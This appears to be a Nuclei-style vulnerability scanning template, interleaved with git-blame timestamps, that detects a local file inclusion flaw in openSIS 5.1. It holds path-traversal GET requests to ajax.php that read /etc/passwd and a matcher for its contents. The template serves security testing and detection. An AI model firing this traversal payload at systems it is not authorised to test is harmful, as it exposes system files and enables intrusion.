2021-07-27 00:43:02 +00:00
id : opensis-lfi
info :
2022-08-05 13:57:51 +00:00
name : openSIS 5.1 - Local File Inclusion
2021-07-27 00:43:02 +00:00
author : pikpikcu
severity : high
2022-08-05 13:57:51 +00:00
description : openSIS 5.1 is vulnerable to local file inclusion and allows attackers to obtain potentially sensitive information by executing arbitrary local scripts in the context of the web server process. This may allow the attacker to compromise the application and computer; other attacks are also possible.
2021-08-19 13:59:12 +00:00
reference :
2021-07-27 00:43:02 +00:00
- https://www.exploit-db.com/exploits/38039
2022-07-10 09:37:18 +00:00
metadata :
shodan-query : http.title:"openSIS"
2022-08-05 13:57:51 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cwe-id : CWE-22
2022-08-27 04:41:18 +00:00
tags : opensis,lfi,edb
2021-07-27 00:43:02 +00:00
requests :
- method : GET
path :
2021-07-27 01:07:21 +00:00
- "{{BaseURL}}/opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php"
- "{{BaseURL}}/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php"
2021-07-27 00:43:02 +00:00
matchers-condition : and
matchers :
- type : regex
regex :
- "root:[x*]:0:0"
- type : status
status :
2021-07-27 01:07:21 +00:00
- 200
2022-08-05 13:57:51 +00:00
# Enhanced by mp on 2022/08/04